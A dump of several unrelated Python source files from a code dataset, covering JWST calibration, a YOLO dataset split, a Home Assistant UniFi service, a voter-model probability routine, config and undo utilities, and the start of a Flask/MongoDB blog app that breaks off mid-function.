    ystart = data.mhdr['SUBSTRT2']
    nx = data.mhdr['SUBSIZE1']
    ny = data.mhdr['SUBSIZE2']
    # Load gain array in units of e-/ADU, cut to the detector subarray
    gain = fits.getdata(meta.gainfile)[ystart:ystart+ny,xstart:xstart+nx]
    # Gain subarray matching the extraction window
    subgain = gain[meta.ywindow[0]:meta.ywindow[1],meta.xwindow[0]:meta.xwindow[1]]
    # Convert to electrons (variance scales with the square of the gain)
    data.subdata *= subgain
    data.suberr *= subgain
    data.subv0 *= (subgain)**2
    return data
def bright2dn(data, meta):
    """
    Convert the subarray data, uncertainty, and variance arrays from
    brightness units (MJy/sr) to raw units (DN), in place.

    Parameters:
    -----------
    data:   object
        Container read/written here: uses `mhdr` (master header, for
        FILTER/PUPIL and EFFINTTM), `shdr` (science header, for PHOTMJSR)
        and `subwave` (pixel wavelengths); rescales `subdata`, `suberr`
        and `subv0` (variance by the squared factor).
    meta:   object
        Provides `photfile`, the absolute path of the JWST photometric
        reference file (R_PHOTOM).

    Return:
    -------
    The same `data` object with arrays in DN.

    Notes:
    ------
    The photometry files can be downloaded from CRDS (https://jwst-crds.stsci.edu/browse_db/)

    Modification History:
    ---------------------
    2021-05-28 kbs Initial version
    """
    # Load response function and wavelength for this filter/pupil, order 1
    foo = fits.getdata(meta.photfile)
    ind = np.where((foo['filter'] == data.mhdr['FILTER']) * (foo['pupil'] == data.mhdr['PUPIL']) * (foo['order'] == 1))[0][0]
    response_wave = foo['wavelength'][ind]
    response_vals = foo['relresponse'][ind]
    # Drop zero-padded wavelength entries before interpolating
    igood = np.where(response_wave > 0)[0]
    response_wave = response_wave[igood]
    response_vals = response_vals[igood]
    # Interpolate response at desired wavelengths
    f = spi.interp1d(response_wave, response_vals, 'cubic')
    response = f(data.subwave)
    # Flux calibration factor (MJy/sr per DN/s)
    scalar = data.shdr['PHOTMJSR']
    # Convert to DN/sec
    data.subdata /= scalar * response
    data.suberr /= scalar * response
    data.subv0 /= (scalar * response)**2
    # From DN/sec to DN using the effective integration time
    int_time = data.mhdr['EFFINTTM']
    data.subdata *= int_time
    data.suberr *= int_time
    # NOTE(review): subv0 is scaled by int_time, not int_time**2, unlike
    # the response factor above — confirm this is intentional.
    data.subv0 *= int_time
    return data
def bright2flux(data, err, v0, pixel_area):
    """
    Convert the data, uncertainty, and variance arrays from brightness
    units (MJy/sr) to flux units (Jy/pix), in place.

    Parameters:
    -----------
    data: ndarray
        data array in units of MJy/sr (modified in place).
    err: ndarray
        uncertainties of data (same shape and units, modified in place).
    v0: ndarray
        Read noise variance array (modified in place).
    pixel_area: ndarray or float
        Pixel area (arcsec^2 per pixel).

    Return:
    -------
    The (data, err, v0) arrays scaled to Jy/pix.

    Modification History:
    ---------------------
    2005-06-20 statia   Written by <NAME>, Cornell.
    2010-01-29 patricio Converted to python.
    2021-05-28 kbs      Updated for JWST.
    """
    # Single conversion factor: steradians per square arcsecond, times 1e6
    # (MJy -> Jy), times the pixel solid angle (per-sr -> per-pixel).
    conv = arcsec ** 2.0 * 1e6 * pixel_area
    data *= conv
    err *= conv
    v0 *= conv
    return data, err, v0
| StarcoderdataPython |
3294005 | # food100_split_for_yolo.py
#
# This script will split the food100 dataset into 2 files of images list
# accourding to the 'percentage_test'. The default is 10% will be assigned to test.
# (1) train.txt - the list of training images
# (2) test.txt - the list of validating images
#
# Credit: script is originated from blob post description
# <https://timebutt.github.io/static/how-to-train-yolov2-to-detect-custom-objects/>
#
import glob, os
# Current directory
current_dir = os.path.dirname(os.path.abspath(__file__))

# Directory where the data will reside, relative to 'darknet.exe'
path_data = '/data'

# Percentage of images to be used for the test set
percentage_test = 10

# Every `index_test`-th image is assigned to the test split.
index_test = round(100 / percentage_test)

# Create and/or truncate train.txt and test.txt. Fix: the original opened
# both files and never closed them; the `with` block guarantees they are
# flushed and closed even on error.
with open('train.txt', 'w') as file_train, open('test.txt', 'w') as file_test:
    counter = 1
    for pathAndFilename in glob.iglob(os.path.join(current_dir, "images/*/*.jpg")):
        # Image path relative to this script's directory.
        f = pathAndFilename.replace(current_dir, '')
        if counter == index_test:
            counter = 1
            file_test.write(path_data + f + "\n")
        else:
            file_train.write(path_data + f + "\n")
            counter = counter + 1
3372948 | <gh_stars>1-10
"""UniFi services."""
from homeassistant.core import callback
from .const import DOMAIN as UNIFI_DOMAIN
SERVICE_REMOVE_CLIENTS = "remove_clients"
@callback
def async_setup_services(hass) -> None:
    """Set up services for UniFi integration."""

    async def async_call_unifi_service(service_call) -> None:
        """Call correct UniFi service."""
        service = service_call.service
        service_data = service_call.data
        # One controller object per configured UniFi site.
        controllers = hass.data[UNIFI_DOMAIN].values()

        if service == SERVICE_REMOVE_CLIENTS:
            await async_remove_clients(controllers, service_data)

    # Single dispatcher handles all UniFi services registered here.
    hass.services.async_register(
        UNIFI_DOMAIN,
        SERVICE_REMOVE_CLIENTS,
        async_call_unifi_service,
    )
@callback
def async_unload_services(hass) -> None:
    """Unload UniFi services."""
    hass.services.async_remove(UNIFI_DOMAIN, SERVICE_REMOVE_CLIENTS)
async def async_remove_clients(controllers, data) -> None:
    """Remove select clients from controller.

    Validates based on:
    - Total time between first seen and last seen is less than 15 minutes.
    - Neither IP, hostname nor name is configured.
    """
    for controller in controllers:
        # Skip controllers we cannot reach right now.
        if not controller.available:
            continue

        clients_to_remove = []

        for client in controller.api.clients_all.values():
            # Keep clients seen for longer than 900 s (15 minutes).
            if client.last_seen - client.first_seen > 900:
                continue

            # Keep clients with any user-assigned identity.
            if any({client.fixed_ip, client.hostname, client.name}):
                continue

            clients_to_remove.append(client.mac)

        if clients_to_remove:
            await controller.api.clients.remove_clients(macs=clients_to_remove)
| StarcoderdataPython |
178900 | <filename>dvm/prob_votes.py
"""
This module implements the prob_votes subroutine for the Discrete Voter Model
for ecological inference.
"""
import functools
import tensorflow as tf
import tensorflow_probability as tfp
import elect
import tools
# NOTE(review): maxsize=None makes this cache unbounded; the key space is
# (flat_index, phc_shape, demo, partitions), so memory grows with distinct
# elections — consider a bounded lru_cache.
@functools.lru_cache(maxsize=None)
def get_vote_probability(flat_index, phc_shape, demo, partitions):
    """
    Find the probability of a PHC's cell producing a
    vote outcome of a given election for a candidate,
    with a given PHC.

    flat_index (int): the flat index of the selected cell
    phc_shape (tuple): the shape of a PHC's Tensor representation
    demo (tuple): the demographics of the district
    partitions (tuple): the partitions of votes for a candidate

    return: the probability that a PHC's cell produced the observed outcome
    """
    # Find the corresponding multi-dimensional index for the flat cell.
    index = tf.unravel_index(flat_index, phc_shape)
    matrix_dim = phc_shape[0]

    # Find the vote percentages for each demographic group
    vote_pcts = elect.get_vote_pcts_list(index, matrix_dim)

    # Binomial calculation
    # Independent binomial distributions for each demographic group where each
    # represents the probability of the voters in that group voting together
    # to satisfy the possible partitions of voters
    pmf = tfp.distributions.Binomial(demo, probs=vote_pcts).prob(partitions)

    # Product over groups per partition, summed over all partitions.
    return tf.math.reduce_sum(tf.math.reduce_prod(pmf, 1))
def prob_votes(phc, demo, observed, rwm=False):
    """
    Find the probability that a PHC produced
    the observed number of votes that a candidate
    received in a given election, with a given
    PHC.

    phc (Tensor): the Tensor representation of a PHC
    demo (dict): the demographics of the district
    observed (int): the observed number of votes the candidate received
    rwm (bool): whether this function serves the RWM or HMC kernel

    return: the log probability that a PHC produced the observed outcomes
    """
    partitions = tuple(tools.permute_integer_partition(observed, len(demo)))

    # For RWM the PHC is used as-is; otherwise it is normalized into a
    # probability distribution first.  Shapes/demographics are converted to
    # tuples so the lru_cache on get_vote_probability can hash them.
    if rwm:
        flat_phc = tf.reshape(phc, [-1])

        get_vote_prob_partial = functools.partial(
            get_vote_probability,
            phc_shape=tuple(phc.shape),
            demo=tuple(demo.values()),
            partitions=partitions)
    else:
        normalized_phc = tools.prob_normalize(phc)
        flat_phc = tf.reshape(normalized_phc, [-1])

        get_vote_prob_partial = functools.partial(
            get_vote_probability,
            phc_shape=tuple(normalized_phc.shape),
            demo=tuple(demo.values()),
            partitions=partitions)

    # Calculate the probability for each cell
    vote_prob = [get_vote_prob_partial(flat_index) for flat_index in range(tf.size(flat_phc))]
    # TODO: Find a way to vectorize the above operation using Tensors
    # vote_prob = tf.map_fn(get_vote_prob_partial,
    #                       tf.range(tf.size(flat_phc)), dtype=tf.float32)

    # tf.math.multiply(vote_prob, flat_phc): the vector of probabilities that
    # each of the events happened (where an event is a cell producing the
    # vote outcome).
    # 1 - tf.math.multiply(vote_prob, flat_phc): the vector of probabilities
    # that each of the events did not happen
    # tf.math.reduce_prod(1 - tf.math.multiply(vote_prob, flat_phc)):
    # the probability that none of the events happened
    phc_prob_complement = tf.math.reduce_prod(
        1 - tf.math.multiply(vote_prob, flat_phc))

    # 1 - phc_prob_complement: the probability that at least one of the events
    # happened
    return tf.math.log(1 - phc_prob_complement)
| StarcoderdataPython |
98194 | <reponame>keenhenry/pda
#!/usr/bin/env python
"""
``Config`` module holds all the configuration-related implementations
used in ``listdb`` package.
"""
try:
import configparser as ConfigParser # python 3.3, 3.4
except ImportError:
import ConfigParser # python 2.6, 2.7
import os
from ..utils import die_msg, PROG_NAME
class PdaConfig(object):
    """
    ``PdaConfig`` is a class which implements configuration abstraction
    for ``ListDB`` class in ``GithubIssues`` module.
    """

    # Fallback values used when a section/option is missing or left empty.
    DEFAULTS = {
        'database-path': '/tmp/.pdastore',
        'username': None,
        'repo-name': None,
        'auth-token': None
    }

    def __init__(self, test_cfg=None):
        """
        :param test_cfg: :class: `file <file>` object or None

        When *test_cfg* is provided it is used as the configuration
        source; otherwise ``~/.pdaconfig`` is read (a missing file simply
        leaves every option at its default).
        """
        try:
            # load configurations from several possible locations
            self.__config = ConfigParser.RawConfigParser(self.DEFAULTS)

            if not test_cfg:
                self.__config.read([os.path.expanduser('~/.pdaconfig')])
            else:
                # read_file() replaced the deprecated (and, since Python
                # 3.12, removed) readfp(); fall back for old interpreters.
                reader = getattr(self.__config, 'read_file',
                                 getattr(self.__config, 'readfp', None))
                reader(test_cfg)
        except ConfigParser.ParsingError as err:
            # crash pda when configuration file is ill-formatted
            die_msg(PROG_NAME, msg=err)

    def __get_option(self, section, option):
        """Return *option* from *section*, falling back to DEFAULTS.

        An empty string is treated as "unset" and also falls back.
        """
        try:
            value = self.__config.get(section, option)
        except (ConfigParser.NoSectionError,
                ConfigParser.DuplicateSectionError):
            # BUG FIX: the original wrote ``except A or B:`` which only
            # ever caught the first class; a tuple catches both.
            value = self.DEFAULTS[option]
        return value if value != "" else self.DEFAULTS[option]

    @property
    def local_db_path(self):
        """Path of the local data store file."""
        return self.__get_option('pda', 'database-path')

    @property
    def username(self):
        """GitHub user name, or None when not configured."""
        return self.__get_option('github', 'username')

    @property
    def reponame(self):
        """GitHub repository name, or None when not configured."""
        return self.__get_option('github', 'repo-name')

    @property
    def authtoken(self):
        """GitHub authentication token, or None when not configured."""
        return self.__get_option('github', 'auth-token')

    @property
    def remote_mode(self):
        """True when username, repo name and auth token are all set."""
        return (self.username is not None) and \
               (self.reponame is not None) and \
               (self.authtoken is not None)
| StarcoderdataPython |
159094 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from datetime import datetime, date, timedelta
import calendar
def get_month_range(start_date=None):
    """Return a ``(first_day, first_day_of_next_month)`` tuple for a month.

    start_date: a ``date`` inside the month of interest; when omitted,
    defaults to the first day of the current month.
    """
    if start_date is None:
        # BUG FIX: the original used replace(day=17), which made the
        # default "month range" start mid-month; a month range must start
        # on day 1 for start + days_in_month to land on the next month.
        start_date = date.today().replace(day=1)
    _, days_in_month = calendar.monthrange(start_date.year, start_date.month)
    end_date = start_date + timedelta(days=days_in_month)
    return (start_date, end_date)
# a_day = timedelta(days = 4)
# first_day, last_day = get_month_range()
# while first_day < last_day:
# print(first_day)
# first_day += a_day
def date_range(start, stop, step):
    """Yield values from *start* (inclusive) to *stop* (exclusive) in *step* increments.

    Works for any type supporting ``<`` and ``+=`` (datetimes, numbers, ...).
    """
    while start < stop:
        yield start
        start += step


# BUG FIX: the original loop header was missing the closing parenthesis on
# the date_range(...) call, making the whole module a SyntaxError.
for d in date_range(datetime(2019, 5, 4), datetime(2019, 6, 1), timedelta(days=4)):
    print(d)
| StarcoderdataPython |
170695 | <gh_stars>0
import gc
import sys
from typing import Callable, List, Optional, Tuple
class Undoable:
    """Maintains a LIFO stack of (undo_callback, purge_callback) pairs.

    Callers register steps with add_undo(), optionally group the steps
    added since the last commit with commit_undo(), and later either roll
    them back with undo() or discard them (running the purge callbacks)
    with purge_undo().
    """

    def __init__(self):
        # Stack of (thing_to_undo, purge_callback) pairs; last in, first out.
        self._undo_stack: List[Tuple[Callable, Callable]] = []
        # How many entries have been pushed since the last commit_undo().
        self._counter_uncommitted_undo = 0

    def add_undo(self, thing_to_undo: Callable, purge_callback: Callable = lambda: None):
        """[Usage] add_undo(lambda_func_for_undo, lambda_callback_for_purge = do_nothing_by_default)"""
        self._undo_stack.append((thing_to_undo, purge_callback))
        self._counter_uncommitted_undo += 1
        # print(f'[Add Undo] stack {len(self._undo_stack)}, uncommitted undos {self._counter_uncommitted_undo}')

    def commit_undo(self, postundo_callback: Optional[Callable] = None, postpurge_callback: Optional[Callable] = None,
                    preundo_callback: Optional[Callable] = None, prepurge_callback: Optional[Callable] = None):
        """Group multiple added undo funcs as a single commit. Extra undo/purge callbacks could be provided"""
        no_extra_undo_callbacks: bool = postundo_callback is None and preundo_callback is None
        no_extra_purge_callbacks: bool = postpurge_callback is None and prepurge_callback is None
        if self._counter_uncommitted_undo == 0:
            return  # just do nothing
        elif self._counter_uncommitted_undo == 1 and (  # when only one undo and no extra callbacks are provided
                no_extra_undo_callbacks and no_extra_purge_callbacks):
            self._counter_uncommitted_undo = 0  # should reset the counter
            return
        pack_to_undo = self._undo_stack[-self._counter_uncommitted_undo:]  # group last k uncommitted undos from stack
        pack_to_undo.reverse()  # reverse the pack for the later invoke
        del self._undo_stack[-self._counter_uncommitted_undo:]  # remove these k undos from stack
        # invoke undo and purge callbacks in the pack
        undo_callbacks = lambda: [(undo[0])() for undo in pack_to_undo]
        purge_callbacks = lambda: [(purge[1])() for purge in pack_to_undo]
        # add extra callbacks to the committed undo pack if provided
        do_nothing = lambda: None  # replace default None as `lambda: None` when not provided
        (postundo_callback, postpurge_callback) = (postundo_callback or do_nothing, postpurge_callback or do_nothing)
        (preundo_callback, prepurge_callback) = (preundo_callback or do_nothing, prepurge_callback or do_nothing)
        actual_undo_callbacks = undo_callbacks if no_extra_undo_callbacks else (
            lambda: [undo() for undo in [preundo_callback, undo_callbacks, postundo_callback]]
        )
        actual_purge_callbacks = purge_callbacks if no_extra_purge_callbacks else (
            lambda: [purge() for purge in [prepurge_callback, purge_callbacks, postpurge_callback]]
        )
        # The whole pack is pushed back as a single stack entry.
        self._undo_stack.append((actual_undo_callbacks, actual_purge_callbacks))
        self._counter_uncommitted_undo = 0  # reset the counter
        # print(f'[Commit Undo] stack: {len(self._undo_stack)}, undo pack: {len(pack_to_undo)}')

    def undo(self, undo_all: bool = False, undo_n_times: int = 1) -> int:
        """[Usage] undo(): undo 1 time; undo(True): undo ALL; undo(False, 5): undo 5 times

        Returns the stack size left after undoing, or -1 when there was
        nothing to undo.
        """
        if len(self._undo_stack) == 0 or undo_n_times < 1:
            return -1  # nothing to undo
        else:
            actual_undo_times = len(self._undo_stack) if undo_all else min(undo_n_times, len(self._undo_stack))
            for _ in range(actual_undo_times):  # undo n times
                (self._undo_stack.pop()[0])()  # i.e., undo_one_commit()
            return len(self._undo_stack)

    def purge_undo(self) -> int:
        """[Usage] purge_undo(): purge ALL

        Returns 0 after purging, or -1 when the stack was already empty.
        """
        if len(self._undo_stack) == 0:
            return -1  # nothing to purge
        else:
            while self._undo_stack:  # purge all
                (self._undo_stack.pop()[1])()  # i.e., purge_one_commit()
            return 0  # i.e.. len(self._undo_stack), should ALWAYS be 0
class UndoableClass(Undoable):
    """Demo subclass showing how to register, commit and trigger undos."""

    def __init__(self):
        super().__init__()
        # One greeting list per say_hi_to() call.
        self.hihi: List[List[str]] = []

    def say_hi_to(self, name: str) -> List[str]:
        """Append ['Hi', name] to self.hihi; each mutation gets an undo step."""
        debug = lambda log: None  # change as `debug = print` to enable debug log
        # === Start Doing Stuff ===
        hi_list: List[str] = []
        self.hihi.append(hi_list)
        self.add_undo(lambda: debug('undo `1. result`') or self.hihi.pop(), lambda: debug('purge `1. result`'))
        hi_list.append('Hi')
        self.add_undo(lambda: debug(f'undo `2. hi`: {hi_list}') or hi_list.pop(), lambda: debug('purge `2. hi`'))
        hi_list.append(name)
        self.add_undo(lambda: debug(f'undo `3. name`: {hi_list}') or hi_list.pop(), lambda: debug('purge `3. name`'))
        # # === End Doing Stuff ===
        # group those added undos as a commit_pack
        self.commit_undo(lambda: debug('postundo `4. commit`'), lambda: debug('postpurge `4. commit`'),
                         lambda: debug('preundo `5. commit`'), lambda: debug('prepurge `5. commit`'))
        return hi_list
if __name__ == '__main__':
    # Usage demo / smoke test for Undoable via UndoableClass.
    demo = UndoableClass()

    # === [Basic] Undo ===
    result = demo.say_hi_to('Gura')  # use _ to consume useless undo
    print('hihi01:', demo.hihi, '; result:', result)  # hihi01: [['Hi', 'Gura']] ; result: ['Hi', 'Gura']
    demo.undo()
    print('hihi02:', demo.hihi)  # hihi02: []
    demo.say_hi_to('A')
    demo.say_hi_to('SHAAAAAARK')
    demo.say_hi_to('MEATLOAF')
    print('hihi03:', demo.hihi)  # hihi03: [['Hi', 'A'], ['Hi', 'SHAAAAAARK'], ['Hi', 'MEATLOAF']]
    print('stack01:', demo.undo())  # stack01: 2 (undo the last one (M): [A, S, M](3) -> [A, S](2) => 2)
    print('hihi04:', demo.hihi)  # hihi04: [['Hi', 'A'], ['Hi', 'SHAAAAAARK']]
    print('stack02:', demo.undo(undo_all=True))  # stack02: 0 (undo all (S, A): [A, S](2) -> [](0) => 0)
    print('hihi05:', demo.hihi)  # hihi05: []
    print('stack03:', demo.undo())  # stack03: -1 (nothing to undo [](0) -> [](0) => -1)

    # === [Basic] Purge Undo ===
    demo.say_hi_to('Gawr')
    demo.say_hi_to('Gura')
    print('stack04:', len(demo._undo_stack), '; hihi06:', demo.hihi)  # stack04: 2 ; hihi06: [[...], [...]]
    print('stack05:', demo.purge_undo(), '; hihi07:', demo.hihi)  # stack05: 0 ; hihi07: [[...], [...]]
    print('stack06:', demo.purge_undo())  # stack06: -1 (nothing to undo)
    print('stack07:', demo.undo())  # stack07: -1 (nothing to undo)
    demo.hihi.clear()

    # === [Advanced] Memory Check ===
    # FIXME: Uncomment following code to check if garbage collection gets invoked as expected (otherwise memory leaks)
    # memcheck_func = UndoableClass()
    # memcheck_purge = UndoableClass()
    # while True:
    #     memcheck_instance = UndoableClass()
    #
    #     for i in range(620):
    #         memcheck_instance.say_hi_to('Floaties')  # ref_instance stay still (auto garbage collected)
    #
    #     memcheck_func.say_hi_to('Trident')
    #     memcheck_func.undo()  # reduce ref_func (undo_stack) & gc_count (hihi)
    #
    #     memcheck_purge.say_hi_to('padowo')
    #     memcheck_purge.purge_undo()  # reduce ref_purge (undo_stack) but the gc_count (hihi) keeps growing
    #     memcheck_purge.hihi.clear()  # reduce gc_count (hihi)
    #
    #     ref_instance, ref_func = sys.getrefcount(memcheck_instance), sys.getrefcount(memcheck_func)
    #     ref_purge, gc_count = sys.getrefcount(memcheck_purge), len(gc.get_objects())
    #     print(f'[Ref] Instance: {ref_instance}, Func: {ref_func: >2}, Purge: {ref_purge: >2}; GC: {gc_count: >5}')
| StarcoderdataPython |
3284268 | <filename>examples/01_quick_start.py
from compas_cem.diagrams import TopologyDiagram
from compas_cem.elements import Node
from compas_cem.elements import TrailEdge
from compas_cem.elements import DeviationEdge
from compas_cem.loads import NodeLoad
from compas_cem.supports import NodeSupport
from compas_cem.plotters import TopologyPlotter
from compas_cem.plotters import FormPlotter
from compas_cem.equilibrium import static_equilibrium
# create a topology diagram
topology = TopologyDiagram()

# add nodes (four collinear nodes along the x axis)
topology.add_node(Node(0, [0.0, 0.0, 0.0]))
topology.add_node(Node(1, [1.0, 0.0, 0.0]))
topology.add_node(Node(2, [2.5, 0.0, 0.0]))
topology.add_node(Node(3, [3.5, 0.0, 0.0]))

# add edges with negative values for a compression-only structure
topology.add_edge(TrailEdge(0, 1, length=-1.0))
topology.add_edge(DeviationEdge(1, 2, force=-1.0))
topology.add_edge(TrailEdge(2, 3, length=-1.0))

# add supports at the two outer nodes
topology.add_support(NodeSupport(0))
topology.add_support(NodeSupport(3))

# add unit downward loads at the two interior nodes
topology.add_load(NodeLoad(1, [0.0, -1.0, 0.0]))
topology.add_load(NodeLoad(2, [0.0, -1.0, 0.0]))

# assemble trails
topology.build_trails()
# print("trails", topology.trails(), "*trail edges", list(topology.trail_edges()))

# calculate equilibrium
form = static_equilibrium(topology, eta=1e-6, tmax=100, verbose=True)

# plot topology
plotter = TopologyPlotter(topology, figsize=(16, 9))
plotter.draw_loads(radius=0.03, draw_arrows=True, scale=0.25)
plotter.draw_nodes(radius=0.03)
plotter.draw_edges()
plotter.show()

# plot form
plotter = FormPlotter(form, figsize=(16, 9))
plotter.draw_nodes(radius=0.03, text="key-xyz")
plotter.draw_edges(text="force-length")
plotter.draw_loads(scale=0.25)
plotter.draw_reactions(scale=0.25)
plotter.show()
| StarcoderdataPython |
3240899 | <gh_stars>1-10
# -*- coding: utf-8 -*-
import logging
def basicConfig(**kwargs):
logging.basicConfig(
format=("%(asctime)s.%(msecs)03d UTC | %(levelname)-8s | %(message)s"),
level=logging.INFO,
datefmt="%Y-%m-%d %H:%M:%S",
**kwargs
)
| StarcoderdataPython |
145153 | <filename>architectures/bobo/model_base.py
# UCF Senior Design 2017-18
# Group 38
import json
import os
import tflearn
import time
CHECKPOINT_DIR = "checkpoints"
CONFIG_DIR = "config"
HYPERPARAMETER_FILENAME = "hyperparameters.json"
OUTPUT_DIR = "output"
class Hyperparameters(object):
    """Exposes a dict of hyperparameters as object attributes.

    The name of every registered hyperparameter is recorded in
    ``param_list`` so the full set can be enumerated later.
    """

    def __init__(self):
        super(Hyperparameters, self).__init__()
        # Names of all hyperparameters registered via set_hp(), in order.
        self.param_list = []

    def set_hp(self, hp):
        """Register each key/value pair of *hp* as an attribute on self."""
        for name, value in hp.items():
            self.param_list.append(name)
            setattr(self, name, value)
class BaseModel(object):
    """
    This is the base model from which all other models will be instantiated
    """

    def __init__(self, model_name, hp_filename=None, hp_content=None):
        """
        Initialize the base model
        inputs:
            model_name:  (String) name of model
            hp_filename: (String) name of hyperparameter file
            hp_content:  (JSON object) keys and values of parameters;
                         when given, no hyperparameter file is read
        """
        super(BaseModel, self).__init__()
        self.name = model_name
        self.model_name = model_name

        # Get the current folder of the executable
        self.current_dir = os.path.dirname(os.path.realpath(__file__))

        # We can save outputs of different models to different folders
        self.output_dir = os.path.join(self.current_dir, OUTPUT_DIR)
        self.checkpoint_dir = os.path.join(self.output_dir, CHECKPOINT_DIR)
        os.makedirs(self.checkpoint_dir, exist_ok=True)

        # The config folder will hold any specific model configurations
        self.config_dir = os.path.join(self.current_dir, CONFIG_DIR)
        if hp_filename is None:
            self.hp_path = os.path.join(self.config_dir, HYPERPARAMETER_FILENAME)
        else:
            self.hp_path = os.path.join(self.config_dir, hp_filename)

        # Load hyperparameter content
        if hp_content is None:
            # BUG FIX: the original called json.load(self.hyparam_path) --
            # an attribute that was never set (the real one is hp_path) --
            # and json.load() requires a file object, not a path string.
            with open(self.hp_path) as hp_file:
                self.hp_json = json.load(hp_file)
        else:
            # This should be called if an already deserialized JSON is passed
            self.hp_json = hp_content

        self.hp = Hyperparameters()
        self.hp.set_hp(self.hp_json)
        self._set_hyperparameters_name()
        self._set_names()

    def _conv_layer(self, incoming, nb_filter, filter_size, activation,
                    padding='same', strides=[1, 1, 1, 1], max_pooling=False,
                    maxpool_ksize=[1, 2, 2, 1], maxpool_stride=[1, 2, 2, 1], bias=True):
        """
        Create a convolutional layer w/ optional activation and/or max pooling
        inputs:
            incoming:       (Tensor) incoming model layers
            padding:        (String) same/valid: SAME will pad the input
                            in order for the filter to complete another full
                            operation, VALID will instead drop the
                            (right/bottom)-most columns
            activation:     (String) enable/disable activation
            max_pooling:    (Boolean) enable max pooling
            maxpool_ksize:  (Vector) max pooling filter size
            maxpool_stride: (Vector) how much the max pooling kernel travels
        """
        # Add activation and/or max-pooling
        if activation is None:
            conv_layer = tflearn.layers.conv.conv_2d(incoming, nb_filter,
                                                     filter_size, strides,
                                                     padding, bias)
        else:
            conv_layer = tflearn.layers.conv.conv_2d(incoming, nb_filter,
                                                     filter_size, strides,
                                                     padding, activation, bias)
        if max_pooling:
            conv_layer = tflearn.layers.conv.max_pool_2d(conv_layer, maxpool_ksize,
                                                         maxpool_stride)
        return conv_layer

    def _dropout(self, incoming, keep_prob):
        """
        Create a dropout layer that encourages the network to be more
        redundant by randomly selecting input elements (neurons) and
        setting their output to zero, effectively "dropping" them
            incoming:  (Tensor) incoming model layers
            keep_prob: (Float) probability of a neuron to be kept
        """
        return tflearn.layers.core.dropout(incoming, keep_prob)

    def _end_softmax_layer(self, incoming, num_labels, activation='softmax'):
        """
        Creates the final layer of the network, which is typically a fully
        connected layer with a softmax function that outputs the
        probability totals of each of the labels in the network
            incoming:   (Tensor) incoming model layers
            num_labels: (Integer) number of labels
            activation: (String) softmax function
        """
        return tflearn.layers.fully_connected(incoming, num_labels, activation)

    def _fully_connected_layer(self, incoming, n_units, activation='relu', bias=True):
        """
        Create a fully connected layer w/ optional activation
            incoming:   (Tensor) incoming model layers
            n_units:    (Integer) size of input
            activation: (String) set the activation function (default: relu)
            bias:       (Boolean) enable/disable bias
        """
        return tflearn.layers.fully_connected(incoming, n_units, activation, bias)

    def _regression(self, incoming, learning_rate, optimizer='adam',
                    loss='categorical_crossentropy'):
        """
        Create an estimator layer that applies a regression to the layer.
            incoming:      (Tensor) incoming model layers
            optimizer:     (String) adjusts the learning rate
            loss:          (String) loss function to be used for regression
            learning_rate: (Float) the change interval for parameters
        """
        return tflearn.layers.estimator.regression(incoming, optimizer=optimizer,
                                                   loss=loss, learning_rate=learning_rate)

    def _set_hyperparameters_name(self):
        """
        Convert hyperparameters dict to a string
        This string will be used to set the models names
        """
        # Generate a little name for each hyperparameter: the first letter
        # of every underscore-separated word plus its value
        # (e.g. learning_rate=0.5 -> "lr_0.5").
        hyperparameters_names = [("".join([p[0] for p in hp.split("_")]), getattr(self.hp, hp))
                                 for hp in self.hp.param_list]
        self.hyperparameters_name = ""
        for index_hyperparameter, hyperparameter in enumerate(hyperparameters_names):
            short_name, value = hyperparameter
            prepend = "" if index_hyperparameter == 0 else "_"
            self.hyperparameters_name += "%s%s_%s" % (prepend, short_name, value)

    def _set_names(self):
        """
        Set all model names (checkpoint name plus tensorboard log names),
        each suffixed with the creation timestamp for uniqueness.
        """
        name_time = "%s--%s" % (self.model_name, time.time())
        # model_name is used to set the ckpt name
        self.model_name = "%s--%s" % (self.hyperparameters_name, name_time)
        # sub_train_log_name is used to set the name of the training part in tensorboard
        self.sub_train_log_name = "%s-train--%s" % (self.hyperparameters_name, name_time)
        # sub_test_log_name is used to set the name of the testing part in tensorboard
        self.sub_test_log_name = "%s-test--%s" % (self.hyperparameters_name, name_time)
| StarcoderdataPython |
1776951 | <gh_stars>1-10
import os
import pkg_resources
## Paths
# Local cache directory for datanator data, under the user's home directory.
DATA_CACHE_DIR = os.path.expanduser(os.path.join('~', '.wc', 'data', 'datanator'))

## Endpoints
CURRENT_VERSION_ENDPOINT = '/v0'

# Speed Constants
METABOLITE_REACTION_LIMIT = 5

# Common Schema Constants
DATA_DUMP_PATH = os.path.join(DATA_CACHE_DIR , 'CommonSchema.sql')

# Per-source display names and initial amounts.
# NOTE(review): the meaning of "initial amount" is defined by the common
# schema builder that consumes these -- confirm there before changing.
PAX_NAME = 'Pax'
PAX_INITIAL_AMOUNT = 1
SABIO_NAME = 'Sabio'
SABIO_INITIAL_AMOUNT = 1
ARRAY_EXPRESS_NAME = 'Array Express'
ARRAY_EXPRESS_INITIAL_AMOUNT = 1
INTACT_NAME = 'IntAct'
INTACT_INITIAL_AMOUNT = 0

## Batching Test Constants -- small batch sizes used by the test suite
PAX_TEST_BATCH = 2
INTACT_INTERACTION_TEST_BATCH = 10
ARRAY_EXPRESS_TEST_BATCH = 5
SABIO_TEST_BATCH = 100

## Batching Build Constants -- full-size batches for production builds
PAX_BUILD_BATCH = 300
INTACT_INTERACTION_BUILD_BATCH = 100000
ARRAY_EXPRESS_BUILD_BATCH = 1000
SABIO_BUILD_BATCH = 100000
INTACT_INTERACTION_BUILD_SUB_BATCH = 5000
| StarcoderdataPython |
3386557 | <filename>app/app.py
from flask import Flask, render_template, request, redirect
from pymongo import MongoClient
from bson.objectid import ObjectId
from datetime import datetime
import os
app = Flask(__name__)

# MongoDB connection settings.
# NOTE(review): credentials are hard-coded; move them to environment
# variables or a secret store before deploying outside a demo cluster.
user = 'username' # username as set for the mongodb admin server (the username used in secret.yaml - before base64 conversion)
password ='password' # password as set for the mongodb admin server (the password used in secret.yaml - before base64 conversion)
host = 'mongodb-service' # service name of the mongodb admin server as set in the service for mongodb server
port = '27017' # port number of the mongodb admin server as set in the service for mongodb server
conn_string = f'mongodb://{user}:{password}@{host}:{port}'
# conn_string='mongodb://127.0.0.1:27017/'

# Handle to the "blog" database; collections are accessed as db.posts etc.
db = MongoClient(conn_string).blog
@app.route('/')
def home():
    """Render the home page listing every blog post."""
    posts = list(db.posts.find({}))
    return render_template("home.html", homeIsActive=True, createPostIsActive=False, posts=posts)
@app.route('/create-post', methods=["GET", "POST"])
def createPost():
    """GET: show the create-post form; POST: store the new post and go home."""
    if(request.method=="GET"):
